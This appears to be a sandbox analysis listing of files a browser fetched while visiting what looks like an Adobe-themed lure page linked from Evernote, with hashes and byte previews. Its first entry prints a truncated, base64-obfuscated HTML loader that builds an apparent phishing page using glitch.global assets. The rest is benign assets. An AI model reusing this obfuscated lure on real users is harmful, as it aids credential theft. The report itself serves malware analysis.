                                        Entropy (8bit):5.590885023364332
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:80DA5094556291AF0BC48186094ED888
                                        SHA1:BDDFD7C9B96657E3CD5DA351E4A634D8F06EAE29
                                        SHA-256:4697F13788044E78ABAA108382E7FE94E0032F86A720AF8C6E82AB75B68A93CB
                                        SHA-512:03F243BED6F519003F3BE9E24EA8CEA24F74996C5915C37CA429F6539A25043327C4AED5239CB603922A3863F624D06FFC2CAB1FF1F54574A0987A926D8D80B2
                                        Malicious:false
                                        Reputation:low
                                        Preview:<!DOCTYPE html>.<html>.<script type="text/javascript">.document.write(decodeURIComponent(atob('JTNDJTNGcGhwJTBBJTBBaW5jbHVkZSglMjdiYi5waHAlMjcpJTNCJTBBJTNGJTNFJTBBJTNDIURPQ1RZUEUlMjBodG1sJTNFJTBBJTNDaHRtbCUyMGxhbmclM0QlMjJlbiUyMiUyMGNsYXNzJTNEJTIyd2YtYWRvYmVjbGVhbi1uNC1hY3RpdmUlMjB3Zi1hZG9iZWNsZWFuLW43LWFjdGl2ZSUyMHdmLWFkb2JlY2xlYW4tbjMtYWN0aXZlJTIwd2YtYWN0aXZlJTIyJTNFJTNDaGVhZCUzRSUwQSUzQ3NjcmlwdCUzRSUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMGZ1bmN0aW9uJTIwYSgpJTdCJTBBJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwJTIwZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJTI3bXlJbWFnZSUyNyklMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAuc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZjZG4uZ2xpdGNoLmdsb2JhbCUyRjQ5ODRlM2Y2LTg4MTctNDUwNC1hOThmLWExNzE0YWE3MjZhMCUyRm91dC5wbmclMjIlM0IlMEElMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjAlMjBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCglMjdkZXRhaWwlMjcpLnZhbHVlJTIwJTNEJTIwJTI3T3V0bG9vayUyNyUzQiUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUwQSUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyMCUyM
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 18 x 18, 8-bit colormap, non-interlaced
                                        Category:downloaded
                                        Size (bytes):249
                                        Entropy (8bit):6.404913268233671
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CC9D81151F2C57146442869486F731EF
                                        SHA1:ADF00A4398FD22C73CEF8881EF142EFA368723B5
                                        SHA-256:380ADBE7CC6CBB73973B1EB8A1A4488496B9FB0AF6F09A76A083B8AA98942E78
                                        SHA-512:26F47E9A1B236EF6029AD056873F33774BB5CE485A13BCDC40E4456F7DAAD20367A5B5EA848EF2B19778977A0527C2360E4CE636788889C84F8372B04CB61C8B
                                        Malicious:false
                                        Reputation:low
                                        URL:https://dashboard.svc.www.evernote.com/app/nv/ce/images/todo-checked.7590e8cd2c641835fc28e0b773603bba.png
                                        Preview:.PNG........IHDR.............a.~e...EPLTE...ttt...vvv...vvvzzz................................................T.......tRNS.O...dNa...^IDAT...K.. .@A..?....?.h....[.i.X#...<...% .."."......HCd.....R.Inr..$4.4]-...*Qyv...:.....B.......IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 36 x 36, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):358
                                        Entropy (8bit):6.830584069908716
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DBFD21407AE764C90F43BC1613B55929
                                        SHA1:F849BEAB19ED7C9B08BA838324AEB03C03CE45A2
                                        SHA-256:F559A1B9958CC73EAF12066D5F66A03A3B250F3D7B927D3DF6C1550148C9A390
                                        SHA-512:9CDC86C1538E3EDFF7E3FCE3F707A76E3302CAFC5316E752F27625AB42AD8144015EC5E3042AB82DBCA664CE90DBDC4170CB943D9376BBC2996323864276CEA9
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR...$...$.......h....]PLTE...vvvwwwvvv.........vvvvvvvvv................................................................t......tRNS.'........Q......IDAT8...... ..` /.e.]..|..4.....n........-.D&R... R;%PTc&U.a.D.|..E.H...2..k..+p.4...H.LK...iH..}.&.....b.#5......X....?.r`..9......L.'.|.hf..V.@+...%..\..Z....}......2.?0Zt........IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:downloaded
                                        Size (bytes):2385
                                        Entropy (8bit):4.552627667062907
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:E36799E0084267AA804E9B470DE17094
                                        SHA1:C15770F1FAADE2A58003BA8D3E34940621987DE2
                                        SHA-256:6BD8880193131672D32517ED1EA30CF871F317B9A62F523F67B8A3B34CAF1722
                                        SHA-512:C3DF0BD86D66A78DC46161D0E5B10802D6E9C34102E8743EA600F995D1018F30B314275D6BE9195937AA24F62FB452D2FA5C61916E72A81CD902808464BC72EB
                                        Malicious:false
                                        Reputation:low
                                        URL:https://cdn.glitch.global/4984e3f6-8817-4504-a98f-a1714aa726a0/adobe_logo_black.svg
                                        Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" width='70' height='18' viewBox="0 0 453.75 118.11" focusable='false'>. <path. d="M202,85.26l-4.89,15.08a1.1,1.1,0,0,1-1.12.82H184.12c-.71,0-.92-.41-.81-1L203.7,41.31a18.89,18.89,0,0,0,1-6.22.68.68,0,0,1,.61-.71h16.31c.51,0,.71.1.82.61l23.14,65.25c.2.51.1.92-.51.92H231.84a1,1,0,0,1-1.13-.71l-5.2-15.19Zm19.78-12.75c-2-6.73-6.12-19.06-8.05-26.3h-.1c-1.64,6.83-5.31,18-8,26.3Z". transform="translate(-6.07 -6.51)"/>. <path. d="M247.21,76.28c0-14.58,10.91-26.81,29.57-26.81.81,0,1.83.1,3.36.2V29.59a.64.64,0,0,1,.71-.71H293.7c.51,0,.61.2.61.61V89.74a56.68,56.68,0,0,0,.41,7.44c0,.51-.1.72-.71.92a51.21,51.21,0,0,1-20.09,4.08C258.83,102.18,247.21,93.62,247.21,76.28Zm32.93-14.47a10.53,10.53,0,0,0-3.77-.51c-7.85,0-14.58,4.79-14.58,14.27,0,10.09,5.81,14.48,13.56,14.48a14.38,14.38,0,0,0,4.79-.61Z". transform="translate(-6.07 -6.51)"/>. <path. d="M352.7,75.57c0,16-10.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 18 x 18, 4-bit colormap, non-interlaced
                                        Category:downloaded
                                        Size (bytes):148
                                        Entropy (8bit):5.38680434324895
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:1072424E2ADB643D754A3491B76DD1B3
                                        SHA1:F0DCF141479F95BE9731A2405ED0A570B133BD70
                                        SHA-256:AE33E79B672F1784798F8D341FA427C3F822B70EB7B3A7FC2D746E2B98B28632
                                        SHA-512:BB12CAF3ACA8B71D966C4C1F9A0513302FD814E528EFC861140B74269394D6A90238750B6F50157E145375207A806E1D4BEA6B54338F14DC5D3AA06DF6C5BEAD
                                        Malicious:false
                                        Reputation:low
                                        URL:https://dashboard.svc.www.evernote.com/app/nv/ce/images/todo-before-checked.8aea89f504987c4f067bc6a76ef46aee.png
                                        Preview:.PNG........IHDR................d....PLTE.................U.>.....tRNS.O...dNa...)IDAT..c`..F.P...``vK......4...3..$.$W....L/..a.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                        Category:downloaded
                                        Size (bytes):5430
                                        Entropy (8bit):1.952456287520738
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DC94F1054A50B313EE14BBD3D4BC1C0A
                                        SHA1:B871EFBBD59E202329352C18B775F7C5743AA8DE
                                        SHA-256:8E263FEF3E738AC1882B97A05CAAF21BBFFC0BDABDF4A7E8338453C18E1E90EC
                                        SHA-512:A66B30C2E23F0D43F06B7C6889892AF0975C79037FB145FD01E84D4FA04234CDF8B32ECEE8FE29FA5FD13DB682485E4EFC7B2F3E8B9D23BDC12586CE417AA080
                                        Malicious:false
                                        Reputation:low
                                        URL:https://auth.services.adobe.com/favicon.ico
                                        Preview:............ .h...&... .... .........(....... ..... ............................................................................................8...........................................................8...................................Q...........#......................................."...@...@.......................................x...............H...................M...............x...............................................................................X...............s...........v...............X.......................................................................................*...................................*...........................................5...5...............................................................................................................p...........................p.......................................................................................................H...................H..............................................
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format (Version 2), CFF, length 29980, version 1.0
                                        Category:downloaded
                                        Size (bytes):29980
                                        Entropy (8bit):7.991242817341188
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:864FC6D95444FD085441968A712F6C9F
                                        SHA1:7E54F060DF28A16E146AB1EB15AB3A59D3D9BE06
                                        SHA-256:371F06319FA71DE555AEBEFCFFBE3C1F755E5761D90AACD9BBA0C64C6CF40090
                                        SHA-512:7CADDDDCD35910BC04D80EB10F0776BBF7C770AFCF960FBBDFCC8E8DB1BACD694883A3E9A1540552B544AE639FA42C9B79690ADB81F7D5210467B6494BA25880
                                        Malicious:false
                                        Reputation:low
                                        URL:https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?subset_id=2&fvd=n7&v=3
                                        Preview:wOF2OTTO..u........0..t..........................F...D?DYNA.i?GDYN.y..H.`..N...6.$..H...... .5...H..V.CDE....}........W.?@..................o.9.%r.xtl%V.H9I....{..;.3..._..Km...LL..5...$..d.-*0.b(...;I $..Vc3.d..|....9..=f..,....4../*......-..J..z...r...C.%....U.V,....T.l......q%...A..]I....E..$.......s...N...p.(4Is.K.r.C.v.L.a...(.e..{............m!...\&p.T2S.O..e...?....#...ylj..!....d....W..E...Q....y..z...!X..^QY..W_9..x...?...M.*..!.......,+`YV.e]........?V.{.jd..+krf.3K?.9...,.8....CREr...YLf..?.3.dqv..\...pU...H`!..*+...l}..)....J.....M.P.;.......;w.....Zw...(.....lM..zj....`X.:.CqL.L..?.....d./...l.y9..xy;. ...P.X .I.l....Y......5'.0S'..L../...p.....+.B.. ....eb..:3.ns..B..a........~L.....R.w..!E.9{.}..dB%.zxq.5.F. ..q0.f.|X..|.o.m..+w.....<&...k9{..&......+...s..."..d2.u.UC..q.K..8....VC'qr.....j[.qb2NZ!.N.O.:._...e..*.C.u..5.8....t.h+...:..!Lv>8......<J......R......A:B.Gg...:.6K.J.N... ......uIl.V.C....{....X..uS.2.)..=..s
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, was "tmpzlfh5zj_", last modified: Tue Feb 14 19:37:58 2023, max compression, original size modulo 2^32 957
                                        Category:downloaded
                                        Size (bytes):487
                                        Entropy (8bit):7.579836279305306
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7F3E8AD7FEEFF9E22B6EAC797ED476D3
                                        SHA1:02118236F8A4CDB9C17EFD61E203BC5A9388BA91
                                        SHA-256:C02855ED9D5684C6D523C96324379FEA8A356A22DB88C0C81F94C79A8E8A2795
                                        SHA-512:0829E41A02CBD68DDC4CC4DFC18862035ADE08AB7050CBEA146CE9A4CAC9F836E6891120C42BB017DE1F0BDB5A754BDE3C5D797D7EE54B6941AEA313C65141C8
                                        Malicious:false
                                        Reputation:low
                                        URL:https://dashboard.svc.www.evernote.com/app/nv/ce/note_viewer_ce.abf33ced9ecbcc919ce9.js
                                        Preview:.......c..tmpzlfh5zj_.uS..0...[.F.!..b#..e..eY.{..(...m.....8.n...h..3.i3..[g.....'^..X...0...........Q.............c....Jc8.%.Qng'...N..k48u.V:UiO...2...;.\<......*T54....u..<..`....` ..G........'F6..].T...$.....,....3......,{...\Ir..r......|.foo./i+,..tq.......g.e$......WB.........L.e.Q[....j.B..P"p;.#b9......".`..+>O.4...P?...q.OFKZb!h.T......FA.Z[O...bqab.F..J'.j..7.~.f\..Z.....v..P....$.v.#..E..;tqH.....U..;..X..IG..z'....8.zH.f.....P....{..^E....E.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:Web Open Font Format (Version 2), CFF, length 29752, version 1.0
                                        Category:downloaded
                                        Size (bytes):29752
                                        Entropy (8bit):7.991259791890674
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:B45F7B0B58EA5CD543323A5E4BA4724B
                                        SHA1:03E815A2FA7461F31FC8ECC18A7063930FC87475
                                        SHA-256:9ABA873D54C84D8D56CFE572AB802BB34322DE6FD945C286D278FABE29A9F3F0
                                        SHA-512:0726643B1B961B3A2E67380A6CED69030E5E97E99C938EBA29830638CC0CA7CF0C42E22DFC6AC77553B21B4E71FF8E3C6BDB8004168449C182A88C9A380D3422
                                        Malicious:false
                                        Reputation:low
                                        URL:https://use.typekit.net/af/40207f/0000000000000000000176ff/27/l?subset_id=2&fvd=n3&v=3
                                        Preview:wOF2OTTO..t8..........s..........................F...]?DYNA.i?GDYN.y..r.`..N...6.$..H....7. ............y..h.0....UUU.&.w... .._..w..._..........s..;.L.xJ.%..4w....{I>le-.pU....[Y.B......_v.....a|.%8Jj"4...I..O.O..d}.A.8P......a.f..S.Oh[...{w....M"...[.,`.B2...`.K=Ql.S...&;....M.C...Z*)..P..S..[;........7.K....h...%..jIC....-.N...n....P....%9.Le.....pT..Z..vk..........:..hvP.Q..h;.....i^__.N.@9.O...G...d...i.D_.6...3..<c..Hw.=...m.. .i...:..m0.H....\......<........4... ..'"<qQ....C.S..A.J.,2.... .2_.....s......[......|.@.6);.O....w6.&[x..7.z.|....if..XDE..].Mp.).I.i.'..H....PW..[c..oUOe...5....^.sJB.(^b.... fL.[..>.J.4.y.....0{QN...4.....E..Qdf....5b....d,.3.^.Z.UD.!..y.....i77.$.S........F.2.8.:.h....az.........:....`x........S_. ..$.q{J..Z2..iWqG`[f.M...p&...3..w....{......:h.....i.qg.%...x...a(...0...2...>...^.w..\.w..e.....]..S;..b..d....+...ld..w....r.k.1QJ...y.a_..\+.g^Vp....v.3[r..+...B>$w....}....u...+8...x..U..6..1Ln!zS..w..h
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1920, components 3
                                        Category:downloaded
                                        Size (bytes):213037
                                        Entropy (8bit):7.961630868909078
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:F6909E1522C7C7429995045609BF7FB9
                                        SHA1:7C7BC3ACE9CC6E47931D955103B35D06024DC480
                                        SHA-256:035E1CE3A98E92550EC1C3CF687F2519C53D65E0A502AB28D361842A30EDCFFD
                                        SHA-512:D391547553FA5C441247A6C0CB4F10688CAE057EFEA8248FA843238A075F0A6C56AA9249119547D348D75AE20255CC7CB0E6B4EA7187DAD72E22B0EBB4F9611C
                                        Malicious:false
                                        Reputation:low
                                        URL:https://auth.services.adobe.com/img/canvas/Leonardoworx.jpg
                                        Preview:......JFIF...........................................+......+&.%#%.&D5//5DNB>BN_UU_wqw................................+......+&.%#%.&D5//5DNB>BN_UU_wqw.............."..........5..................................................................1..i...(.}.E...~......../~2l.......?...J<...vG...2..n.-U....gYn.(...exk6SK...;].<;-.K...E.r.et..).+k.m.....s.J=.Z..q..}..sq..#...^...R..::*../[..x[..........^.s.....~.g.c8.k?..>..'..z..l..W..R.r.d...|{..U..3.J..].v.W.Y....t.w.].#g..$..../-w..y.....x.{H'.,.....S..l.W...v.T..C....J<Z......6..=.=x.}.9G.U6.gV..~,g...Xz...Q/A....i...<...,t...g.....?..>.......x.3..>/B...V.e..Dav:.S6ztJ...e...3....HFQ...........$.... .. ....D..CE..*.&.....Di.r.gG..y..|L.h.7;.Z0.[3...Y........q.IFY........?.z..s.~.2.e...)J.|=...v....e..e.B...p...B..+..zNC.gj.........FWwK..s...Zm..c...t..]>.c.49....>Kg...y.......W.m.yc.....e.c.>.<..Y.j.7r9k.Y....R<s.].yh....d....:.....*.=2.<.......*..d...E./..W]..?.......6.K....Y....'.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (1490)
                                        Category:downloaded
                                        Size (bytes):50234
                                        Entropy (8bit):5.521600788203435
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:54E51056211DDA674100CC5B323A58AD
                                        SHA1:26DC5034CB6C7F3BBE061EDD37C7FC6006CB835B
                                        SHA-256:5971B095CFF574A66D35ADA016D4C077C86E2DEA62E9C0F14CF7C94B258619DE
                                        SHA-512:E305D190287C28CA0CC2E45B909A304194175BB08351AD3F22825B1D632B1A217FB4B90DFD395637932307A8E0CC01DA2F47831FA4EDA91A18E49EFE6685B74B
                                        Malicious:false
                                        Reputation:low
                                        URL:https://www.google-analytics.com/analytics.js
                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=this||self,n=function(a,b){a=a.split(".");var c=aa;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};var p=function(a,b){for(var c in b)b.hasOwnProperty(c)&&(a[c]=b[c])},q=function(a){for(var b in a)if(a.hasOwnProperty(b))return!0;return!1};function t(){for(var a=u,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function v(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var u,w;.function ba(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=w[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}u=u||v();w=w||t();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&2
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows icon resource - 5 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel
                                        Category:downloaded
                                        Size (bytes):33310
                                        Entropy (8bit):2.4343818646024715
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:BA5CF22304195770A75772CCC2621DA0
                                        SHA1:18E9F2113F51BDC6D805253D93577D48BC1E31B4
                                        SHA-256:BB12C34997F9A72E29A41950FFE2F96FAD2E6AE5826B6D448EFADA91897E7ACE
                                        SHA-512:0BFD3CD1CB0FD9E0979A64617D6273612A5E49BC5B636F22567591CECD42D0DB4856ACACA97AFF7D9DA43331FF88FECDA0711929C2E653E7C3D5C941DE619508
                                        Malicious:false
                                        Reputation:low
                                        URL:https://dashboard.svc.www.evernote.com/app/nv/icons-1ec2b385e995168bc5bb4934b116d4a6/favicon.ico
                                        Preview:............ .(...V......... .(...~... .... .(.......00.... .($......@@.... .(@...A..(....... ..... .........................................................1..F....-.......D..\........................................F...-...0.../..|-...-......g..................................../...-......g0......+-.......0...........................................-......^....-...-......?...................!1..|/.......2...........;...1...-...-...-..d............1..c-...-...-...-......i2..D....-...-...-...-...-..u........3..+-...-...-...-...-...-...-...-...-...-...-...-...-..~......../...-...-...-...-...-...-...-...-...-...-...-...-...-..~............-...-...-...-...-...-...-...-...-...0..W/...-...-..w....4...-...-...-...-...-...-...-...-...-...-...2...-...-......h........-...-...-...-...-...-...-...-...-...-...-...-...-...-..Q........0..%-...-.......0...-...-...-...-...-...-...-...-......0............1...-...-...-...-...-...-...-...-...-...-...-...;...............1...-...-...-...-...-...-...-...-.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 100 x 101, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):19499
                                        Entropy (8bit):7.970217722175567
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:86E9DC068353482F4CC2CFA7D15BF94D
                                        SHA1:86C3446561214F815A1FE7EC5BB8EEDFE75079ED
                                        SHA-256:8E6B6714FADE64D20EA10EB12F12B157696CCEDD48207C1BAD197E8AC9B2E8AB
                                        SHA-512:B8460E50D27DF75182234CEE5FD94959DD5238A9B4AEB4420473CDE38E472BBBFA91BFB8945B31DF53F4B27C73EB726F15485FCA42637BBD13043E19B7691FD7
                                        Malicious:false
                                        Reputation:low
                                        URL:https://cdn.glitch.global/4984e3f6-8817-4504-a98f-a1714aa726a0/1.png
                                        Preview:.PNG........IHDR...d...e.......F.....gAMA....|.Q....hiCCPICC Profile..H..W.TS...[RIh.P.....UJ.-..T.FH..%...b....E.+.*b[].Y.b/.`...e].EQT..t.W...;_...ow&w...^.T..j../).%D.....H..........K...1..`.wyw. ......?......r>..x.3.r~>.M....RY!.D%o5.P..%...`...R.l...*|d@')..q+.d..'..@...YE.lhG.....X...p..."..be....'+q%..P_.1...f~c3.o.3...x.CX.....ri.o..Y..-.y.A....D...e....r'G+1...Ifl...........RE..d.>j.s`...bW./,.b..#$y.1j>3K......t......!.....D..f..../..K.a..s<._.....d.........i...R!.Bl]$N..X.b.ynb.Zgd...;.#S$(.8A(..U...d..j..|.`..f.......EIQ..`.....a.X.P.N..#.....E ..W.=.J...vz......8U.....-.y.J..bOyQ.z..R....>.%-.OR....F........a....e.. ..[.../.H......B.f.g...H.3...? .....Q!(...!V.t.Y..E.3r.S..A4.....$C.R...........r....W....5.......$...Q....n....x.|.....~.y|.'<%.........'....r4h..#......-....:..3qc..{B?l<.z..,G...*..l.-.o.Z..JA)......35.5...(k.m}T.f..34...7...>.{Ml!v.;....cG.z..c..%.....'..k.[.@<.....xj..J.]k];]?....S....3Y:M&....... dq%|..,wWw7.......[
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 230 x 54, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):7126
                                        Entropy (8bit):7.8986305155778656
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:3F7B62B0A0DB9CC2370F627075E989C8
                                        SHA1:9DBF01B247669258EA5ECD145BA3FCAFB2FEFA64
                                        SHA-256:E98B54C20B26623832732102D8EA3EEAD581ED89F75491299D87061FEE9061E6
                                        SHA-512:53D15E2A5B7E1F37893FB9D1DDF4284F4972E292D81730FE8623DD822CB81366832A6D7AA2C02CC5718290D11BD1463B85988A4E249AF147C229EA6CBE3143D4
                                        Malicious:false
                                        Reputation:low
                                        Preview:.PNG........IHDR.......6......T....hiCCPICC Profile..H..W.TS...[RIh.P.....UJ.-..T.FH..%...b....E.+.*b[].Y.b/.`...e].EQT..t.W...;_...ow&w...^.T..j../).%D.....H..........K...1..`.wyw. ......?......r>..x.3.r~>.M....RY!.D%o5.P..%...`...R.l...*|d@')..q+.d..'..@...YE.lhG.....X...p..."..be....'+q%..P_.1...f~c3.o.3...x.CX.....ri.o..Y..-.y.A....D...e....r'G+1...Ifl...........RE..d.>j.s`...bW./,.b..#$y.1j>3K......t......!.....D..f..../..K.a..s<._.....d.........i...R!.Bl]$N..X.b.ynb.Zgd...;.#S$(.8A(..U...d..j..|.`..f.......EIQ..`.....a.X.P.N..#.....E ..W.=.J...vz......8U.....-.y.J..bOyQ.z..R....>.%-.OR....F........a....e.. ..[.../.H......B.f.g...H.3...? .....Q!(...!V.t.Y..E.3r.S..A4.....$C.R...........r....W....5.......$...Q....n....x.|.....~.y|.'<%.........'....r4h..#......-....:..3qc..{B?l<.z..,G...*..l.-.o.Z..JA)......35.5...(k.m}T.f..34...7...>.{Ml!v.;....cG.z..c..%.....'..k.[.@<.....xj..J.]k];]?....S....3Y:M&....... dq%|..,wWw7.......[..7.a^...4..W...
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, was "tmp_8txp8k5", last modified: Tue Feb 14 19:37:58 2023, max compression, original size modulo 2^32 3150370
                                        Category:downloaded
                                        Size (bytes):784225
                                        Entropy (8bit):7.999169791056705
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:D67EA503C9E254D33E7EF49C9A60912F
                                        SHA1:0B886B7DBA20E531D502938A9B9EC3166C5D781A
                                        SHA-256:EEC71C674A456B1212C131C9DDB8C5DA9D56EFDFBA50226537FAB4446F833AC5
                                        SHA-512:2F75D7984DC16BE2929A0EE871B39A3FCEE2F4B0B45031717306D3890D3DB059A00D53D89900C55EB1441143E59A62A809CF79B46A2E7075C60828390A5030D7
                                        Malicious:false
                                        Reputation:low
                                        URL:https://dashboard.svc.www.evernote.com/app/nv/ce/ce-001e22adb7.js
                                        Preview:.......c..tmp_8txp8k5...s$.q(...........D......6..cvw,,.c.\.Xh.1...;.{v...h.DQ.m?..i..H.hj..........E.x>.C...../\f}tWuW..(J.]...tW.GVUVVfVV..~.kG...q........7....i[.....Oy.....k..V..v..x..a5..3<...w..g.vT:...N....n..6......R..v.....`....{./.a.PE.....\c.*].*ug..\.c..z..=.N..!5.....tC7..............o5.........h.....x.|.9... ..X.ga.u.V".[.)..c.t0..B..".z.,.l.l...f....]r,q....G..qvk..7|6*.3..O....+..y.2X.s...u..W......X:......G*.M...A.......w.9...a..;.....;...O,<..{..H..;_.<..w.:..l......Iq(..C........F...;r..t.D.......}.n.9..u......P.^...u...@.,...w...._.....EP.cGv.0p.5..?H}..U.Q-.N.Nx.8.fY.A)p..?=x..}.q.>.....=.jR.F.....A..u.y{<..F..A.N.C;p..a`.!.v./..A.S.ci.s;.'..).^.;VD.. ....":..!.Ev..&O.0h..nU..b....Am.wPXi6...w...9sZa.v.N.t...`N3.w...{N.Y..q.N...K..c;.........7..C...;...L...c..i8t.f.=)......Q.../Y..)Y......o.fhv.y`...._\`....|...,...._Z..k.^v..)..z.........8.qj..A.D....Oh._..#..EVyq..K^{v./...y..v4.....,9..I8..].=..z/Y.{..w..Yl..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:SVG Scalable Vector Graphics image
                                        Category:dropped
                                        Size (bytes):2556
                                        Entropy (8bit):4.662006300198535
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:663CAAA3B8E7047F97025FAA6926E9D0
                                        SHA1:731CDFEB571119530C9006F5E6212A855E92D86F
                                        SHA-256:D91C29BCF81C848135875CEC80202A9A5C36FBE48E35483A143CE6A177275ADC
                                        SHA-512:ADE6FB3029FE8D075CB9207B0920BBCE7593E7F2D01D3400B8E344D68800D5F9152DA6F8A1B74D7552B1195A4DC9CC5B2631B0315A9A6CD00AA54F885C6E55A6
                                        Malicious:false
                                        Reputation:low
                                        Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" width='154' height='40' viewBox="0 0 453.75 118.11" focusable='false'>. <defs>. <style>.cls-1{fill:#fff;}</style>. </defs>. <path class="cls-1". d="M202,85.26l-4.89,15.08a1.1,1.1,0,0,1-1.12.82H184.12c-.71,0-.92-.41-.81-1L203.7,41.31a18.89,18.89,0,0,0,1-6.22.68.68,0,0,1,.61-.71h16.31c.51,0,.71.1.82.61l23.14,65.25c.2.51.1.92-.51.92H231.84a1,1,0,0,1-1.13-.71l-5.2-15.19Zm19.78-12.75c-2-6.73-6.12-19.06-8.05-26.3h-.1c-1.64,6.83-5.31,18-8,26.3Z". transform="translate(-6.07 -6.51)"/>. <path class="cls-1". d="M247.21,76.28c0-14.58,10.91-26.81,29.57-26.81.81,0,1.83.1,3.36.2V29.59a.64.64,0,0,1,.71-.71H293.7c.51,0,.61.2.61.61V89.74a56.68,56.68,0,0,0,.41,7.44c0,.51-.1.72-.71.92a51.21,51.21,0,0,1-20.09,4.08C258.83,102.18,247.21,93.62,247.21,76.28Zm32.93-14.47a10.53,10.53,0,0,0-3.77-.51c-7.85,0-14.58,4.79-14.58,14.27,0,10.09,5.81,14.48,13.56,14.48a14.38,14.38,0,0,0,4.79-.61Z".
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:gzip compressed data, was "tmpj7ca4f0t", last modified: Tue Feb 14 19:37:58 2023, max compression, original size modulo 2^32 365385
                                        Category:downloaded
                                        Size (bytes):103917
                                        Entropy (8bit):7.995070760925403
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:9B7EB5EA16C5BA4A40C2A32CF9FA9599
                                        SHA1:2E7399E122F0FF0F86D59457395D93DC4B228021
                                        SHA-256:A0E741B65F6DBEF93E34B1982D5518A61DE7ACBAF61DE94B3A993CCC4A93E139
                                        SHA-512:D9A77F86C99209F96CE21E89B546BF8299AE323285414412662FCC1512D96309C6FB8CD77D3A5FB82A4D9A1725864D1A855C1DCCD4917DDC4AC0879A976B5B2A
                                        Malicious:false
                                        Reputation:low
                                        URL:https://dashboard.svc.www.evernote.com/app/nv/ce/ce-450b2463e5.css
